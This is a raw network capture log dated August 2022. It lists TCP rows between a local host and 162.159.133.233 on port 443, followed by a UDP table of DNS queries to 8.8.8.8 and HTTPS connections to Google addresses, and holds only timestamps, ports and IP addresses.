Aug 23, 2022 03:46:59.194408894 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.194432020 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.194483995 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.194493055 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.194530010 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.194549084 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.194825888 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.194849014 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.194899082 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.194909096 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.194931030 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.194961071 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.195463896 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.195486069 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.195542097 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.195553064 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.195575953 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.195596933 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.195854902 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.195873976 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.195928097 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.195938110 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.195962906 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.195980072 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.196217060 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.196247101 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.196295023 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.196305990 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.196321011 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.196348906 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.196616888 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.196639061 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.196698904 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.196707010 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.196737051 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.196753025 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.197180033 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.197200060 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.197266102 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.197277069 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.197309017 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.197324991 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.197978020 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.197999001 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.198077917 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.198090076 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.198112011 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.198132992 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.198407888 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.198431015 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.198492050 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.198502064 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.198532104 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.198542118 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.198776960 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.198797941 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.198862076 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.198873997 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.198903084 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.198916912 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.199292898 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.199312925 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.199378014 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.199389935 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.199424028 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.199446917 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.199713945 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.199736118 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.199795008 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.199805021 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.199835062 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.199847937 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.200078964 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.200102091 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.200167894 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.200180054 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.200210094 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.200228930 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.200426102 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.200444937 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.200505018 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.200514078 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.200541973 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.200566053 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.200829983 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.200853109 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.200912952 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.200925112 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.200947046 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.200967073 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.201191902 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.201211929 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.201277971 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.201287985 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.201314926 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.201332092 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.201519966 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.201539040 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.201606989 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.201617956 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.201658964 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.201678038 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.201781034 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.201802015 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.201865911 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.201875925 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.201900959 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.201924086 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.202109098 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.202132940 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.202203989 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.202214956 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.202261925 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.202496052 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.202526093 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.202577114 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.202586889 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.202620983 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.202631950 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.203438044 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.203460932 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.203546047 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.203557014 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.203577995 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.203604937 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.203834057 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.203857899 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.203916073 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.203926086 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.203949928 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.203973055 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.204148054 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.204169035 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.204231024 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.204241991 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.204256058 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.204288006 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.204627991 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.204649925 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.204722881 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.204732895 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.204761982 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.204780102 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.205075026 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.205097914 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.205168009 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.205178022 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.205204964 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.205226898 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.205359936 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.205383062 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.205437899 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.205447912 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.205472946 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.205498934 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.205672979 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.205696106 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.205746889 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.205756903 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.205782890 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.205800056 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.206002951 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.206023932 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.206083059 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.206094027 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.206113100 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.206135988 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.206407070 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.206429958 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.206482887 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.206492901 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.206513882 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.206536055 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.206811905 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.206832886 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.206890106 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.206899881 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.206929922 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.206944942 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.207310915 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.207334995 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.207406044 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.207417011 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.207442045 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.207463026 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.207715034 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.207737923 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.207797050 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.207807064 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.207820892 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.207853079 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.208098888 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.208121061 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.208189964 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.208200932 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.208225012 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.208244085 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.208668947 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.208689928 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.208756924 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.208766937 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.208792925 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.208817005 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.208921909 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.208945036 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.209000111 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.209009886 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.209032059 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.209053993 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.209350109 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.209424019 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.209445000 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.209453106 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.209490061 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.209665060 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.209685087 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.209738016 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.209748983 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.209773064 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.209999084 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.210020065 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.210083961 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.210095882 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.210105896 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.210268021 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.210289955 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.210355043 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.210366964 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.210376978 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.210611105 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.210639000 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.210700989 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.210715055 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.210764885 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.210894108 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.210915089 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.210973024 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.210983992 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.211008072 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.211216927 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.211237907 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.211302042 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.211316109 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.211324930 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.211513042 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.211523056 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.211600065 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.211611986 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.211627007 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.211880922 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.211901903 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.211954117 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.211956978 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.211976051 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.211986065 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.212030888 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.212388039 CEST	50076	443	192.168.2.3	162.159.133.233

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 23, 2022 03:42:33.262109041 CEST	57134	53	192.168.2.3	8.8.8.8
Aug 23, 2022 03:42:33.263854027 CEST	62050	53	192.168.2.3	8.8.8.8
Aug 23, 2022 03:42:33.266056061 CEST	56042	53	192.168.2.3	8.8.8.8
Aug 23, 2022 03:42:33.279366016 CEST	53	57134	8.8.8.8	192.168.2.3
Aug 23, 2022 03:42:33.289298058 CEST	53	62050	8.8.8.8	192.168.2.3
Aug 23, 2022 03:42:33.293051004 CEST	53	56042	8.8.8.8	192.168.2.3
Aug 23, 2022 03:42:36.007164955 CEST	65107	53	192.168.2.3	8.8.8.8
Aug 23, 2022 03:42:36.025856018 CEST	53	65107	8.8.8.8	192.168.2.3
Aug 23, 2022 03:42:36.307853937 CEST	53848	53	192.168.2.3	8.8.8.8
Aug 23, 2022 03:42:36.326616049 CEST	53	53848	8.8.8.8	192.168.2.3
Aug 23, 2022 03:42:36.569544077 CEST	58691	53	192.168.2.3	8.8.8.8
Aug 23, 2022 03:42:36.587903976 CEST	53	58691	8.8.8.8	192.168.2.3
Aug 23, 2022 03:42:40.325299025 CEST	60749	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:40.344774961 CEST	443	60749	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:40.348658085 CEST	60749	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:40.352463007 CEST	443	60749	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:40.352497101 CEST	443	60749	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:40.353111029 CEST	60749	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:40.367526054 CEST	443	60749	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:40.367556095 CEST	443	60749	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:40.368302107 CEST	60749	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:40.419249058 CEST	60749	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:40.420418024 CEST	60749	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:40.420778036 CEST	60749	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:40.421108961 CEST	60749	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:40.437813044 CEST	443	60749	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:40.438071966 CEST	443	60749	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:40.438090086 CEST	443	60749	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:40.439137936 CEST	60749	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:40.439249039 CEST	443	60749	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:40.439261913 CEST	443	60749	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:40.439286947 CEST	60749	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:40.439455032 CEST	60749	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:40.439630985 CEST	60749	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:40.473753929 CEST	60749	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:40.481733084 CEST	443	60749	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:57.585952997 CEST	53428	53	192.168.2.3	8.8.8.8
Aug 23, 2022 03:42:57.603174925 CEST	53	53428	8.8.8.8	192.168.2.3
Aug 23, 2022 03:43:32.730974913 CEST	59374	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:32.750473022 CEST	443	59374	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:32.752151966 CEST	59374	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:32.758032084 CEST	443	59374	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:32.758089066 CEST	443	59374	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:32.758371115 CEST	59374	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:32.770817041 CEST	443	59374	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:32.770862103 CEST	443	59374	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:32.803653955 CEST	59374	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:32.803857088 CEST	59374	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:32.807071924 CEST	443	59374	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:32.807291985 CEST	59374	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:32.822951078 CEST	443	59374	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:33.112173080 CEST	59374	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:33.112351894 CEST	59374	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:33.112550974 CEST	59374	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:33.131160021 CEST	443	59374	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:33.131206036 CEST	443	59374	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:33.146178961 CEST	59374	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:33.146279097 CEST	59374	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:33.156182051 CEST	443	59374	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:36.060101986 CEST	62431	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:36.060321093 CEST	62431	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:36.060561895 CEST	62431	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:36.084831953 CEST	443	62431	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:36.084882975 CEST	443	62431	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:36.084911108 CEST	443	62431	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:36.086364985 CEST	443	62431	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:36.086405039 CEST	443	62431	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:36.086441994 CEST	443	62431	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:36.086469889 CEST	443	62431	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:36.086998940 CEST	62431	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:36.087069988 CEST	62431	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:36.087182045 CEST	62431	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:36.088413000 CEST	64271	443	192.168.2.3	142.251.209.4
Aug 23, 2022 03:43:36.103780985 CEST	443	62431	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:36.103866100 CEST	443	62431	8.8.4.4	192.168.2.3
